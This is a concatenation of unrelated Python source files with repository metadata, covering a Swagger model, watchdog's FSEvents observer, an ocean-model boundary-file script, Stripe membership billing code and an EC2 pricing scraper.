:type: int
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NominalAccountCategoryInput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
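# --- Usage sketch (editor's addition): the id value is an arbitrary example.
if __name__ == "__main__":
    category_input = NominalAccountCategoryInput(id=42)
    print(category_input.to_dict())                               # {'id': 42}
    print(category_input == NominalAccountCategoryInput(id=42))   # True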
| 26.905172
| 92
| 0.565203
|
674814800745c049e6594b81cfaa9a460acb354a
| 6,543
|
py
|
Python
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 31
|
2016-11-24T11:17:46.000Z
|
2022-02-14T22:45:39.000Z
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 8
|
2017-11-17T03:25:29.000Z
|
2021-05-04T00:32:28.000Z
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2017-01-23T08:58:41.000Z
|
2019-04-30T03:35:31.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:module: watchdog.observers.fsevents
:synopsis: FSEvents based emitter implementation.
:author: yesudeep@google.com (Yesudeep Mangalapilly)
:platforms: Mac OS X
"""
from __future__ import with_statement
import sys
import threading
import unicodedata
import _watchdog_fsevents as _fsevents
from watchdog.events import (
FileDeletedEvent,
FileModifiedEvent,
FileCreatedEvent,
FileMovedEvent,
DirDeletedEvent,
DirModifiedEvent,
DirCreatedEvent,
DirMovedEvent
)
from watchdog.utils.dirsnapshot import DirectorySnapshot
from watchdog.observers.api import (
BaseObserver,
EventEmitter,
DEFAULT_EMITTER_TIMEOUT,
DEFAULT_OBSERVER_TIMEOUT
)
class FSEventsEmitter(EventEmitter):
"""
Mac OS X FSEvents Emitter class.
:param event_queue:
The event queue to fill with events.
:param watch:
A watch object representing the directory to monitor.
:type watch:
:class:`watchdog.observers.api.ObservedWatch`
:param timeout:
Read events blocking timeout (in seconds).
:type timeout:
``float``
"""
def __init__(self, event_queue, watch, timeout=DEFAULT_EMITTER_TIMEOUT):
EventEmitter.__init__(self, event_queue, watch, timeout)
self._lock = threading.Lock()
self.snapshot = DirectorySnapshot(watch.path, watch.is_recursive)
def on_thread_stop(self):
_fsevents.remove_watch(self.watch)
_fsevents.stop(self)
def queue_events(self, timeout):
with self._lock:
if not self.watch.is_recursive\
and self.watch.path not in self.pathnames:
return
new_snapshot = DirectorySnapshot(self.watch.path,
self.watch.is_recursive)
events = new_snapshot - self.snapshot
self.snapshot = new_snapshot
# Files.
for src_path in events.files_deleted:
self.queue_event(FileDeletedEvent(src_path))
for src_path in events.files_modified:
self.queue_event(FileModifiedEvent(src_path))
for src_path in events.files_created:
self.queue_event(FileCreatedEvent(src_path))
for src_path, dest_path in events.files_moved:
self.queue_event(FileMovedEvent(src_path, dest_path))
# Directories.
for src_path in events.dirs_deleted:
self.queue_event(DirDeletedEvent(src_path))
for src_path in events.dirs_modified:
self.queue_event(DirModifiedEvent(src_path))
for src_path in events.dirs_created:
self.queue_event(DirCreatedEvent(src_path))
for src_path, dest_path in events.dirs_moved:
self.queue_event(DirMovedEvent(src_path, dest_path))
def run(self):
try:
def callback(pathnames, flags, emitter=self):
emitter.queue_events(emitter.timeout)
# for pathname, flag in zip(pathnames, flags):
# if emitter.watch.is_recursive: # and pathname != emitter.watch.path:
# new_sub_snapshot = DirectorySnapshot(pathname, True)
# old_sub_snapshot = self.snapshot.copy(pathname)
# diff = new_sub_snapshot - old_sub_snapshot
# self.snapshot += new_subsnapshot
# else:
# new_snapshot = DirectorySnapshot(emitter.watch.path, False)
# diff = new_snapshot - emitter.snapshot
# emitter.snapshot = new_snapshot
# INFO: FSEvents reports directory notifications recursively
# by default, so we do not need to add subdirectory paths.
#pathnames = set([self.watch.path])
# if self.watch.is_recursive:
# for root, directory_names, _ in os.walk(self.watch.path):
# for directory_name in directory_names:
# full_path = absolute_path(
# os.path.join(root, directory_name))
# pathnames.add(full_path)
self.pathnames = [self.watch.path]
_fsevents.add_watch(self,
self.watch,
callback,
self.pathnames)
_fsevents.read_events(self)
except Exception as e:
pass
class FSEventsObserver(BaseObserver):
def __init__(self, timeout=DEFAULT_OBSERVER_TIMEOUT):
BaseObserver.__init__(self, emitter_class=FSEventsEmitter,
timeout=timeout)
def schedule(self, event_handler, path, recursive=False):
# Python 2/3 compat
try:
str_class = unicode
except NameError:
str_class = str
# Fix for issue #26: Trace/BPT error when given a unicode path
# string. https://github.com/gorakhargosh/watchdog/issues#issue/26
if isinstance(path, str_class):
#path = unicode(path, 'utf-8')
path = unicodedata.normalize('NFC', path)
# We only encode the path in Python 2 for backwards compatibility.
# On Python 3 we want the path to stay as unicode if possible for
# the sake of path matching not having to be rewritten to use the
# bytes API instead of strings. The _watchdog_fsevent.so code for
# Python 3 can handle both str and bytes paths, which is why we
# do not HAVE to encode it with Python 3. The Python 2 code in
# _watchdog_fsevents.so was not changed for the sake of backwards
# compatibility.
if sys.version_info < (3,):
path = path.encode('utf-8')
return BaseObserver.schedule(self, event_handler, path, recursive)
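# --- Usage sketch (editor's addition): watch a directory with the
# FSEvents-based observer defined above (macOS only); the path is a placeholder.
if __name__ == '__main__':
    import time
    from watchdog.events import LoggingEventHandler
    observer = FSEventsObserver()
    observer.schedule(LoggingEventHandler(), path='/tmp', recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()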
| 37.820809
| 82
| 0.631667
|
d202291fe501bf207705ef5fda9e48ae11943a63
| 2,692
|
py
|
Python
|
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | null | null | null |
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | 3
|
2018-01-23T23:23:24.000Z
|
2018-02-07T22:37:28.000Z
|
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
import subprocess
import os
import sys
from multiprocessing import Pool
from functools import partial
import numpy as np
#import pdb
#increase the maximum number of open files allowed
#import resource
#resource.setrlimit(resource.RLIMIT_NOFILE, (3000,-1))
import pycnal
import pycnal_toolbox
from remap_bdry import remap_bdry
from remap_bdry_uv import remap_bdry_uv
data_dir = '/archive/u1/uaf/kate/HYCOM/SCS/data/'
dst_dir='./bdry/'
def do_file(file, src_grd, dst_grd):
zeta = remap_bdry(file, 'ssh', src_grd, dst_grd, dst_dir=dst_dir)
dst_grd = pycnal.grid.get_ROMS_grid('PALAU1', zeta=zeta)
remap_bdry(file, 'temp', src_grd, dst_grd, dst_dir=dst_dir)
remap_bdry(file, 'salt', src_grd, dst_grd, dst_dir=dst_dir)
# pdb.set_trace()
remap_bdry_uv(file, src_grd, dst_grd, dst_dir=dst_dir)
# merge file
bdry_file = dst_dir + file.rsplit('/')[-1][:-3] + '_bdry_' + dst_grd.name + '.nc'
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_ssh_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-O', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_temp_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_salt_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_u_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_v_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
year = int(sys.argv[1])
#lst_year = sys.argv[1:]
lst_year = [year]
lst_file = []
for year in lst_year:
    year = str(year)
command = 'ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '*'
lst = subprocess.check_output(command, shell=True)
lst = lst.split()
lst_file = lst_file + lst
print('Build OBC file from the following file list:')
print(lst_file)
print(' ')
src_grd_file = data_dir + '../HYCOM_GLBa0.08_PALAU_grid.nc'
src_grd = pycnal_toolbox.Grid_HYCOM.get_nc_Grid_HYCOM(src_grd_file)
dst_grd = pycnal.grid.get_ROMS_grid('PALAU1')
processes = 4
p = Pool(processes)
# Trick to pass more than one arg
partial_do_file = partial(do_file, src_grd=src_grd, dst_grd=dst_grd)
results = p.map(partial_do_file, lst_file)
| 32.829268
| 89
| 0.677935
|
618528c70a84476e40d387b613e773eb1b9841ff
| 21
|
py
|
Python
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
__version__ = '1.5.0'
| 21
| 21
| 0.666667
|
fdd834377560b818e5d8adf51e4f042776881e72
| 982
|
py
|
Python
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 5
|
2019-05-30T02:55:16.000Z
|
2020-03-03T14:18:23.000Z
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 3
|
2019-12-27T00:53:23.000Z
|
2020-02-17T05:29:19.000Z
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 4
|
2019-06-04T06:26:14.000Z
|
2021-01-07T04:25:32.000Z
|
# coding: utf-8
"""
Eclipse Kapua REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.device_configuration import DeviceConfiguration # noqa: E501
from swagger_client.rest import ApiException
class TestDeviceConfiguration(unittest.TestCase):
"""DeviceConfiguration unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDeviceConfiguration(self):
"""Test DeviceConfiguration"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.device_configuration.DeviceConfiguration() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.95122
| 119
| 0.721996
|
27d14c0ac221dc531e7a779e5dcef3dbcc2e684d
| 11,292
|
py
|
Python
|
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
import logging
from datetime import datetime, timedelta
from sqlalchemy import text, func
from typing import Mapping, Optional
import stripe
from p2k16.core import P2k16UserException, mail
from p2k16.core.models import db, Account, StripePayment, model_support, Membership, StripeCustomer, Company
logger = logging.getLogger(__name__)
def paid_members():
return Account.query. \
join(StripePayment, StripePayment.created_by_id == Account.id). \
filter(StripePayment.end_date >= (datetime.utcnow() - timedelta(days=1))). \
all()
def active_member(account: Account = None) -> bool:
"""
    Verify that the user is an active member of Bitraf, either as a paying member or via a company membership.
"""
# Check paying membership
if StripePayment.query. \
filter(StripePayment.created_by_id == account.id,
StripePayment.end_date >= (datetime.utcnow() - timedelta(days=1))).count() > 0:
return True
# Check company membership
if len(Company.find_active_companies_with_account(account.id)) > 0:
return True
return False
def get_membership(account: Account):
"""
Get membership info for account
:param account:
:return: Membership model
"""
return Membership.query.filter(Membership.created_by_id == account.id).one_or_none()
def get_membership_fee(account: Account):
"""
Get membership fee for account
:param account:
:return: Fee or None
"""
membership = get_membership(account)
if membership is None:
return None
else:
return membership.fee
def get_stripe_customer(account: Account):
"""
Get stripe customer for account
:param account:
:return: StripeCustomer model
"""
return StripeCustomer.query.filter(StripeCustomer.created_by_id == account.id).one_or_none()
def get_membership_payments(account: Account):
return StripePayment.query.filter(StripePayment.created_by_id == account.id).all()
def find_account_from_stripe_customer(stripe_customer_id) -> Optional[Account]:
"""
Get account from stripe customer
:param stripe_customer_id:
:return: account
"""
sc = StripeCustomer.query.filter(StripeCustomer.stripe_id == stripe_customer_id).one_or_none()
return Account.find_account_by_id(sc.created_by_id) if sc is not None else None
def parse_stripe_event(event):
logger.info("Received stripe event: id={id}, type={type}".format(id=event.id, type=event.type))
if event.type == 'invoice.created':
handle_invoice_created(event)
elif event.type == 'invoice.updated':
handle_invoice_updated(event)
elif event.type == 'invoice.payment_succeeded':
handle_payment_success(event)
elif event.type == 'invoice.payment_failed':
handle_payment_failed(event)
else:
pass # Not implemented on purpose
def handle_invoice_created(event):
pass
def handle_invoice_updated(event):
pass
def handle_payment_success(event):
customer_id = event.data.object.customer
account = find_account_from_stripe_customer(customer_id)
with model_support.run_as(account):
invoice_id = event.data.object.id
timestamp = datetime.fromtimestamp(event.data.object.date)
items = event.data.object.lines.data[0]
payment = StripePayment(invoice_id, datetime.fromtimestamp(items.period.start),
datetime.fromtimestamp(items.period.end), items.amount / 100, timestamp)
db.session.add(payment)
db.session.commit()
def handle_payment_failed(event):
pass
def member_get_details(account):
# Get mapping from account to stripe_id
stripe_customer_id = get_stripe_customer(account)
details = {}
try:
# Get payment details
details['card'] = "N / A"
details['card_exp'] = ""
details['stripe_price'] = "0"
details['stripe_subscription_status'] = "none"
if stripe_customer_id is not None:
# Get customer object
cu = stripe.Customer.retrieve(stripe_customer_id.stripe_id)
if len(cu.sources.data) > 0:
card = cu.sources.data[0]
details['card'] = "**** **** **** " + card.last4
details['card_exp'] = "%r/%r" % (card.exp_month, card.exp_year)
# Get stripe subscription to make sure it matches local database
assert len(cu.subscriptions.data) <= 1
for sub in cu.subscriptions.data:
details['stripe_subscription_status'] = sub.status
details['stripe_price'] = sub.plan.amount / 100
# Get current membership
membership = get_membership(account)
if membership is not None:
details['fee'] = membership.fee
details['first_membership'] = membership.first_membership
details['start_membership'] = membership.start_membership
else:
details['fee'] = 0
# Export payments
payments = []
for pay in get_membership_payments(account):
payments.append({
'id': pay.id,
'start_date': pay.start_date,
'end_date': pay.end_date,
'amount': float(pay.amount),
'payment_date': pay.payment_date
})
details['payments'] = payments
except stripe.error.StripeError:
raise P2k16UserException("Error reading data from Stripe. Contact kasserer@bitraf.no if the problem persists.")
return details
def member_set_credit_card(account, stripe_token):
# Get mapping from account to stripe_id
stripe_customer_id = get_stripe_customer(account)
try:
if stripe_customer_id is None:
# Create a new stripe customer and set source
cu = stripe.Customer.create(
description="Customer for %r" % account.name,
email=account.email,
source=stripe_token
)
stripe_customer_id = StripeCustomer(cu.stripe_id)
logger.info("Created customer for user=%r" % account.username)
else:
# Get customer object
cu = stripe.Customer.retrieve(stripe_customer_id.stripe_id)
if cu is None or (hasattr(cu, 'deleted') and cu.deleted):
logger.error("Stripe customer does not exist. This should not happen! account=%r, stripe_id=%r" %
(account.username, stripe_token))
raise P2k16UserException("Set credit card invalid state. Contact kasserer@bitraf.no")
# Create a new default card
new_card = cu.sources.create(source=stripe_token)
cu.default_source = new_card.id
cu.save()
# Delete any old cards
for card in cu.sources.list():
if card.id != new_card.id:
card.delete()
# Commit to db
db.session.add(stripe_customer_id)
db.session.commit()
# Check if there are any outstanding invoices on this account that needs billing
for invoice in stripe.Invoice.list(customer=cu.stripe_id):
if invoice.paid is False and invoice.closed is False and invoice.forgiven is False:
invoice.pay()
logger.info("Successfully updated credit card for user=%r" % account.username)
return True
except stripe.error.CardError as e:
err = e.json_body.get('error', {})
msg = err.get('message')
logger.info("Card processing failed for user=%r, error=%r" % (account.username, err))
raise P2k16UserException("Error updating credit card: %r" % msg)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Error updating credit card due to stripe error. Contact kasserer@bitraf.no if the "
"problem persists.")
def member_cancel_membership(account):
try:
# Update local db
membership = get_membership(account)
db.session.delete(membership)
# Update stripe
stripe_customer_id = get_stripe_customer(account)
for sub in stripe.Subscription.list(customer=stripe_customer_id):
sub.delete(at_period_end=True)
db.session.commit()
mail.send_membership_ended(account)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Stripe error. Contact kasserer@bitraf.no if the problem persists.")
def member_set_membership(account, membership_plan, membership_price):
# TODO: Remove membership_price and look up price from model
try:
membership = get_membership(account)
if membership_plan == 'none':
member_cancel_membership(account)
return True
# --- Update membership in local db ---
if membership is not None:
            if membership.fee == membership_price:
# Nothing's changed.
logger.info("No membership change for user=%r, type=%r, amount=%r" % (
account.username, membership_plan, membership_price))
return
else:
membership.fee = membership_price
membership.start_membership = datetime.now()
else:
# New membership
membership = Membership(membership_price)
# --- Update membership in stripe ---
# Get customer object
stripe_customer_id = get_stripe_customer(account)
if stripe_customer_id is None:
raise P2k16UserException("You must set a credit card before changing plan.")
# Check for active subscription
subscriptions = stripe.Subscription.list(customer=stripe_customer_id)
if subscriptions is None or len(subscriptions) == 0:
sub = stripe.Subscription.create(customer=stripe_customer_id, items=[{"plan": membership_plan}])
else:
sub = next(iter(subscriptions), None)
stripe.Subscription.modify(sub.id, cancel_at_period_end=False,
items=[{
'id': sub['items']['data'][0].id,
'plan': membership_plan
}],
prorate=False)
# Commit to db
db.session.add(membership)
db.session.commit()
logger.info("Successfully updated membership type for user=%r, type=%r, amount=%r" % (
account.username, membership_plan, membership_price))
mail.send_new_member(account)
return True
except stripe.error.CardError as e:
err = e.json_body.get('error', {})
msg = err.get('message')
logger.info("Card processing failed for user=%r, error=%r" % (account.username, err))
raise P2k16UserException("Error charging credit card: %r" % msg)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Stripe error. Contact kasserer@bitraf.no if the problem persists.")
| 33.707463
| 119
| 0.632483
|
a414e1ae55f870fb74da9eba626a861260660ea8
| 30,233
|
py
|
Python
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 3,046
|
2015-01-06T11:55:26.000Z
|
2021-02-10T15:21:27.000Z
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 435
|
2015-01-11T00:57:25.000Z
|
2021-02-10T11:14:56.000Z
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 442
|
2015-01-10T23:47:01.000Z
|
2021-02-10T13:18:08.000Z
|
#!/usr/bin/env python
from lxml import etree
import re
import json
import locale
import ec2
from six.moves.urllib import request as urllib2
# Following advice from https://stackoverflow.com/a/1779324/216138
# The locale must be installed in the system, and it must be one where ',' is
# the thousands separator and '.' is the decimal fraction separator.
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
class Instance(object):
def __init__(self):
self.arch = []
self.api_description = None
self.availability_zones = {}
self.base_performance = None
self.burst_minutes = None
self.clock_speed_ghz = None
self.compute_capability = 0
self.devices = 0
self.drive_size = None
self.ebs_iops = 0
self.ebs_max_bandwidth = 0
self.ebs_only = True
self.ebs_optimized = False
self.ebs_throughput = 0
self.ebs_as_nvme = False
self.ECU = 0
self.enhanced_networking = None
self.family = ''
self.FPGA = 0
self.generation = None
self.GPU = 0
self.GPU_memory = 0
self.GPU_model = None
self.includes_swap_partition = False
self.instance_type = ''
self.intel_avx = None
self.intel_avx2 = None
self.intel_avx512 = None
self.intel_turbo = None
self.linux_virtualization_types = []
self.memory = 0
self.network_performance = None
self.num_drives = None
self.nvme_ssd = False
self.physical_processor = None
self.placement_group_support = False
self.pretty_name = ''
self.pricing = {}
self.size = 0
self.ssd = False
self.storage_needs_initialization = False
self.trim_support = False
self.vCPU = 0
self.vpc = None
self.vpc_only = True
self.emr = False
def get_type_prefix(self):
"""h1, i3, d2, etc"""
return self.instance_type.split(".")[0]
def get_ipv6_support(self):
"""Fancy parsing not needed for ipv6 support.
"IPv6 is supported on all current generation instance types and the
C3, R3, and I2 previous generation instance types."
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html
FIXME: This should be a @property, but this project is still Python 2. Yikes!
"""
ipv4_only_families = ("cg1", "m1", "m3", "c1", "cc2", "g2", "m2", "cr1", "hs1", "t1")
return self.get_type_prefix() not in ipv4_only_families
def to_dict(self):
d = dict(family=self.family,
instance_type=self.instance_type,
pretty_name=self.pretty_name,
arch=self.arch,
vCPU=self.vCPU,
GPU=self.GPU,
GPU_model=self.GPU_model,
GPU_memory=self.GPU_memory,
compute_capability=self.compute_capability,
FPGA=self.FPGA,
ECU=self.ECU,
base_performance=self.base_performance,
burst_minutes=self.burst_minutes,
memory=self.memory,
ebs_optimized=self.ebs_optimized,
ebs_throughput=self.ebs_throughput,
ebs_iops=self.ebs_iops,
ebs_as_nvme=self.ebs_as_nvme,
ebs_max_bandwidth=self.ebs_max_bandwidth,
network_performance=self.network_performance,
enhanced_networking=self.enhanced_networking,
placement_group_support=self.placement_group_support,
pricing=self.pricing,
vpc=self.vpc,
linux_virtualization_types=self.linux_virtualization_types,
generation=self.generation,
vpc_only=self.vpc_only,
ipv6_support=self.get_ipv6_support(),
physical_processor=self.physical_processor,
clock_speed_ghz=self.clock_speed_ghz,
intel_avx=self.intel_avx,
intel_avx2=self.intel_avx2,
intel_avx512=self.intel_avx512,
intel_turbo=self.intel_turbo,
emr=self.emr,
availability_zones=self.availability_zones)
if self.ebs_only:
d['storage'] = None
else:
d['storage'] = dict(ssd=self.ssd,
trim_support=self.trim_support,
nvme_ssd=self.nvme_ssd,
storage_needs_initialization=self.storage_needs_initialization,
includes_swap_partition=self.includes_swap_partition,
devices=self.num_drives,
size=self.drive_size)
return d
def __repr__(self):
return "<Instance {}>".format(self.instance_type)
def sanitize_instance_type(instance_type):
"""Typos and other bad data are common in the instance type colums for some reason"""
# Remove random whitespace
instance_type = re.sub(r"\s+", "", instance_type, flags=re.UNICODE)
# Correct typos
typo_corrections = {
"x1.16large": "x1.16xlarge", # https://github.com/powdahound/ec2instances.info/issues/199
"i3.4xlxarge": "i3.4xlarge", # https://github.com/powdahound/ec2instances.info/issues/227
"i3.16large": "i3.16xlarge", # https://github.com/powdahound/ec2instances.info/issues/227
"p4d.2xlarge": "p4d.24xlarge", # as of 2020-11-15
}
return typo_corrections.get(instance_type, instance_type)
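# Hedged illustration (not part of the original scraper): a tiny, uncalled
# self-check showing how the typo table above behaves; the names used here are the
# ones already listed in typo_corrections, and unknown names pass through unchanged.
def _example_sanitize_instance_type():
    assert sanitize_instance_type(" i3.4xlxarge ") == "i3.4xlarge"  # whitespace stripped, typo corrected
    assert sanitize_instance_type("m5.large") == "m5.large"  # clean names are returned as-is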
def totext(elt):
s = etree.tostring(elt, method='text', encoding='unicode').strip()
return re.sub(r'\*\d$', '', s)
def transform_size(size):
if size == 'u':
return 'micro'
if size == 'sm':
return 'small'
if size == 'med':
return 'medium'
m = re.search('^(x+)l$', size)
if m:
xs = len(m.group(1))
if xs == 1:
return 'xlarge'
else:
return str(xs) + 'xlarge'
assert size == 'lg', "Unable to parse size: %s" % (size,)
return 'large'
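# Hedged illustration (not part of the original scraper): the size abbreviations
# handled above, written as an uncalled self-check.
def _example_transform_size():
    assert transform_size('u') == 'micro'
    assert transform_size('sm') == 'small'
    assert transform_size('med') == 'medium'
    assert transform_size('lg') == 'large'
    assert transform_size('xl') == 'xlarge'
    assert transform_size('xxl') == '2xlarge'  # every extra 'x' bumps the multiplier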
def transform_region(reg):
region_map = {
'eu-ireland': 'eu-west-1',
'eu-frankfurt': 'eu-central-1',
'apac-sin': 'ap-southeast-1',
'apac-syd': 'ap-southeast-2',
'apac-tokyo': 'ap-northeast-1'}
if reg in region_map:
return region_map[reg]
m = re.search(r'^([^0-9]*)(-(\d))?$', reg)
assert m, "Can't parse region: %s" % (reg,)
base = m.group(1)
num = m.group(3) or '1'
return base + "-" + num
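# Hedged illustration (not part of the original scraper): how pricing-page region
# labels are normalized to canonical AWS region ids by transform_region.
def _example_transform_region():
    assert transform_region('eu-ireland') == 'eu-west-1'  # explicit mapping
    assert transform_region('us-east') == 'us-east-1'     # a missing number defaults to 1
    assert transform_region('us-west-2') == 'us-west-2'   # already canonical, passes through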
def add_ebs_pricing(imap, data):
for region_spec in data['config']['regions']:
region = transform_region(region_spec['region'])
for t_spec in region_spec['instanceTypes']:
typename = t_spec['type']
for i_spec in t_spec['sizes']:
i_type = i_spec['size']
if i_type not in imap:
print("ERROR: Got EBS pricing data for unknown instance type: {}".format(i_type))
continue
inst = imap[i_type]
inst.pricing.setdefault(region, {})
# print "%s/%s" % (region, i_type)
for col in i_spec['valueColumns']:
inst.pricing[region]['ebs'] = col['prices']['USD']
def add_pricing_info(instances):
for i in instances:
i.pricing = {}
by_type = {i.instance_type: i for i in instances}
ec2.add_pricing(by_type)
# EBS cost surcharge as per https://aws.amazon.com/ec2/pricing/on-demand/#EBS-Optimized_Instances
ebs_pricing_url = 'https://a0.awsstatic.com/pricing/1/ec2/pricing-ebs-optimized-instances.min.js'
pricing = fetch_data(ebs_pricing_url)
add_ebs_pricing(by_type, pricing)
def fetch_data(url):
content = urllib2.urlopen(url).read().decode()
try:
pricing = json.loads(content)
except ValueError:
        # if the data isn't valid JSON, try to parse it as JSONP
json_string = re.search(r'callback\((.*)\);', content).groups()[0] # extract javascript object
json_string = re.sub(r"(\w+):", r'"\1":', json_string) # convert to json
pricing = json.loads(json_string)
return pricing
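# Hedged illustration (not part of the original scraper) of the JSONP fallback in
# fetch_data above, applied to a made-up payload instead of a network response.
def _example_jsonp_fallback():
    content = 'callback({vers: 0.01, regions: [{region: "us-east-1"}]});'
    json_string = re.search(r'callback\((.*)\);', content).groups()[0]  # strip the callback wrapper
    json_string = re.sub(r"(\w+):", r'"\1":', json_string)  # quote the bare JavaScript keys
    return json.loads(json_string)  # now plain JSON -> Python dict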
def add_eni_info(instances):
# Canonical URL for this info is https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html
# eni_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.partial.html"
# It seems it's no longer dynamically loaded
eni_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html"
tree = etree.parse(urllib2.urlopen(eni_url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]//table')[1]
rows = table.xpath('.//tr[./td]')
by_type = {i.instance_type: i for i in instances}
for r in rows:
instance_type = etree.tostring(r[0], method='text').strip().decode()
max_enis = etree.tostring(r[1], method='text').decode()
# handle <cards>x<interfaces> format
if 'x' in max_enis:
parts = max_enis.split('x')
max_enis = locale.atoi(parts[0]) * locale.atoi(parts[1])
else:
max_enis = locale.atoi(max_enis)
